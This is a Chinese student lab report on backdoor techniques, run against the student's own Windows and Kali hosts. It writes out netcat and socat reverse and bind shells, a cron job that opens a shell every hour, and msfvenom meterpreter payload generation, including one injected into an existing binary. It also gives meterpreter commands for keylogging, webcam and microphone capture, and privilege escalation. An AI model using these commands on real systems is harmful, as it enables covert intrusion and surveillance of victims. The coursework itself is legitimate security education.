首页 > 其他分享 >20222413 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222413 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-19 15:35:05浏览次数:1  
标签:后门 20222413 exe 获取 Windows 主机 2024 2025 2413

1.实验内容

本周学习的主要内容为缓冲区溢出的shellcode技术,及其RNS、NSR、RS三种缓冲区溢出技术。此外,我还学习了在Linux系统和Windows系统中缓冲区溢出的实例和防范方法。在实验过程中,我初步了解并实践实现了后门原理,能够使用工具生成后门入侵控制其他主机。

2.实验目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)。
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。
(2)使用socat获取主机操作Shell, 任务计划启动 。
(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell。
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权。
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

3.实验过程

3.1使用netcat获取主机操作Shell,cron启动某项任务(任务自定)。
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。
(1)获取主机和虚拟机的ip地址。


(2)令Windows主机为攻击者,kali虚拟机为被攻击者。使用netcat获取kali操作shell。
在Windows中输入ncat -lp 2413监听2413号端口。

ncat -lp 2413

在kali虚拟机中输入nc 172.16.178.92 2413 -e /bin/sh主动连接Windows的2413端口并执行shell。

nc 172.16.178.92 2413 -e /bin/sh


随后在Windows端即可获取kali的shell,输入ls得到正确回复。
(3)操作cron执行任务
①在kali虚拟机执行指令

crotab -e

在文件的末尾添加代码,每个小时的三十分反向连接Windows的2413窗口并执行shell。

35 * * * * /bin/netcat 172.16.178.92 2413 -e /bin/sh


②在Windows中监听2413窗口,14:35时获取到kali的shell

3.2使用socat获取主机操作Shell, 任务计划启动 。
(1)在Windows中创建任务


(2)设置任务为在14:50时执行一次

(3)任务内容为启动socat.exe程序,添加参数为

socat.exe tcp-listen:2413 exec:cmd.exe,pty,stderr
参数的含义为:
·调用socat工具,指示其在TCP上监听指定端口的连接
·当有连接到达时,执行 cmd.exe(Windows 命令提示符)
·pty 创建一个伪终端,使远程用户能够看到一个交互式的命令提示符
·stderr 将 cmd.exe 的标准错误输出(stderr)也发送到连接


(4)kali使用socat工具监听Windows2413端口,在14:50获取Windows的shell提示符。
(由于更换网络,之后实验的Windows主机的ip地址更换为172.16.231.61)

3.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(1)使用MSF meterpreter(或其他软件)生成可执行文件。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.117.129 LPORT=2413 -f exe > backdoor2413.exe
·-p是指定 payload。这个 payload 是一个 Windows 平台的 Meterpreter payload,它会与指定的主机建立反向 TCP 连接。
·Meterpreter 是 Metasploit ·Framework 的一个功能强大的 Meterpreter 会话接口。
·LHOST是本地主机ip,LPORT是本地主机端口,在本实验中是windows的反弹回连地址和端口
·-f exe 指定输出格式为可执行文件(exe)
·> 将可执行文件重定向成后面的文件名>

(2)将ncat生成的后门传送到Windows。
①在kali虚拟机中将后门文件传输到Windows的2413端口。

nc 172.16.231.61 2413 < backdoor2413.exe

②在Windows中,使用管理员身份进入cmd,监听2413端口并接受后门文件。

ncat -lv 2413 > backdoor2413.exe


在Windows对于存储位置中可以看到传输的文件

(3)关闭Windows的防病毒保护后,在kali中进入msf控制台

msfconsle

随后在控制台中配置

use exploit/multi/handler
设置一个多用途的监听器(handler),该监听器可以接收来自多个不同payload的连接
set payload windows/meterpreter/reverse_tcp
设置了 payload 为 Windows Meterpreter 反向 TCP
set LHOST 172.16.231.61
设置本地主机ip(Kali的ip),与前面生成可执行文件的相同
set LPORT 2413
设置本地主机的端口号(Kali的port)
exploit
触发


(4)在Windows端运行传输的后门文件,在kali端可以看到进入meterpreter,成功获取主机shell

3.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(1)在kali端输入相关命令获取实验要求内容
①录制Windows主机5s的音频并生成音频文件

record_mic -d 5

②获取主机摄像头并生成照片

webcam_snap

③获取主机截屏

screenshot

④获取主机击键记录

keyscan_start
开启击键记录获取
keyscan_dump
结束击键记录获取并输出获取的结果

⑤提权:

getuid获取主机用户
sysinfo 查看系统命令
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限


击键记录

获取的截图、照片、音频文件

提权

3.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
(1)使用MSF生成shellcode,注入到实践1中的pwn1中

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.117.129 LPORT=2413 -x /mnt/hgfs/Share/pwn1 -f elf > pwn#20222413
调用 Metasploit Framework 的 msfvenom 工具
指定 payload ,它将尝试与攻击者指定的主机建立反向 TCP 连接
设置本地主机的ip和port(Kali的)
使用 -x 选项指定一个现有的可执行文件 pwn1 作为模板
-f elf指定输出格式为 ELF(Linux中的可执行文件,与windows中的PE文件对应)
将生成的 ELF 文件重定向并保存为 pwn#20222413

(2)开启msf控制台后并进行配置(与前文配置相同)
(3)开启另一个终端,运行pwn#20222413文件,另一个终端进入meterperter获取pwn1的shell

4.实验问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
点击攻击邮件的网络链接后自动下载后门程序,下载带有后门的风险应用程序,通过U盘等存储设备传输后门文件。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:直接双击启动、通过定时任务启动后门
Linux:利用cron、反弹shell启动后门
(3)Meterpreter有哪些给你映像深刻的功能?
获取主机屏幕截图、主机摄像头、击键记录、录音。这些功能能够轻松监控被攻击者的重要隐私,包括住所、网络浏览内容、账号密码的击键记录、日常交流内容等,其攻击影响和可能造成的损失令我印象深刻。
(4)如何发现自己有系统有没有被安装后门?
①使用杀毒软件进行系统查杀
②在任务管理器中检查是否有可疑进程
③看时间查看器--windows日志--系统,安全--信息--下部的常规--看服务文件名是否有可疑程序。
④检查是否有可疑ip在进行外网链接。

5.问题及解决方案

  • 问题1:在Windows端运行传输的后门文件时,电脑的病毒查杀已经关闭,依然弹出文件不可运行。
  • 问题1解决方案:检查文件后发现文件大小为0kb,可能在传输过程中出现错误。重新传输后文件大小为73kb。可以正常运行进入meterpreter
  • 问题2:Windows接收后门文件时,系统提示无法访问
  • 问题2解决方案:在D盘接收后门文件时需要以管理员身份启动cmd,否则权限不足导致传输失败。

6.学习感悟、思考等

通过实验二,我了解了netcat、socat、msf meterpreter工具的基本使用方法,得知了如何进行简单的后门攻击。实验的过程中我参考了学习通中老师的演示视频和网络相关资料,但在实际实验过程中,由于电脑配置的差异,我仍然遇到了很多问题导致实验无法顺利进行。在搜集资料解决遇到的相关问题中我也了解到了更多课外的网络知识,对计算机系统和网络攻防技术有了更多新的理解。这一过程中令我头痛不已的同时也令我受益匪浅。

参考资料

https://gitee.com/wildlinux/NetSec/attach_files

标签:后门,20222413,exe,获取,Windows,主机,2024,2025,2413
From: https://www.cnblogs.com/hhshhs/p/18475812

相关文章

  • 2024年华为OD机试真题-勾股数元组-Java-OD统一考试(E卷)
    最新华为OD机试考点合集:华为OD机试2024年真题题库(E卷+D卷+C卷)_华为od机试题库-CSDN博客     每一题都含有详细的解题思路和代码注释,精编c++、JAVA、Python三种语言解法。帮助每一位考生轻松、高效刷题。订阅后永久可看,发现新题及时跟新。题目描述:如果3个正整数(a,b,c)......
  • [DMY]2024 CSP-S 模拟赛 Day 18
    今天打的虽然有遗憾,但是也在情理之中。赛时看了眼T1,没有别人的犹豫,第一眼就看到了\(n\le5000\),然后开始写最短路。算了一下dijkstra根本跑不满,无需deque的01bfs。写完以后大概40min,改一下longlong就扔了。赛后没挂,100pts。T2一开始没有思路,在纸上画画图感觉可以......
  • 20241019医学图像的K空间
    空间频率:二维平面上明暗相间的条纹......
  • 【刷题册】2024.10.13 - 2024.10.15
    目录一、2024.10.131.1BC153[NOIP2010]数字统计1.2NC313两个数组的交集1.2.1思路一:暴力O(N^2)1.2.2思路二:hash1.3AB5点击消除二、2024.10.142.1BC64⽜⽜的快递2.2DP4最⼩花费爬楼梯2.3数组中两个字符串的最⼩距离三、2024.10.153.1BC149简写单词3.2dd......
  • 【PS2024】编辑修改、图像制作、广告创意等 PS软件下载安装Adobe Photoshop
    目录一、软件简介1.1AdobePhotoshop概述1.2版本历史1.3系统要求二、下载与安装2.1下载方式2.2安装步骤三、功能介绍3.1基本图像编辑功能3.2高级图像处理功能3.3设计与排版功能四、操作指南4.1界面布局4.2常用快捷键4.3操作技巧一、软件简介1.1......
  • 20222419 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程(2)使用socat获取主机操作Shell,任务计划启动(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行......
  • 2024.10.17~19 杂题
    杂题AcWing5728.截取子串一眼dp,令\(f[i]\)表示考虑到第\(i\)位的答案。由于要求方案数,要么加法原理,要么乘法原理。观察样例二,用乘法原理可以解释但是很难扩展到\(f\)上,所以考虑加法原理。对于样例二,每一个位置字母都一样,不难发现\(f[3]=f[1]+f[2]\)。考虑将其一般化......
  • [随笔]网鼎杯大赛2024真题及赛前培训CTF
    欢迎你来这里,真题题目真没有。赛前培训可以到这里:https://vip.ctf.show/?invite=18742【赛前模拟】10月19日当天前往https://c.wangdingcup.com/#/login可以参加模拟训练。不过这届举办方真有意思,还得10月18日前完成报名的才可以参加。【猜测】官方公众号是10月17日下午......
  • 2024.10.19 1152版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......
  • AI绘画:2024最全面的ComfyUI插件与Lora的下载及使用!
    前言本节我们介绍ComfyUI插件和Lora的下载及使用方式。1.安装1.1Checkpoint安装将从前面介绍的模型下载平台下载后,放在ComfyUI/models/checkpoints文件夹下。1.2Lora安装在前面介绍的模型下载网站下载Lora模型,然后放在ComfyUI/models/loras文件夹下。所有的AI设......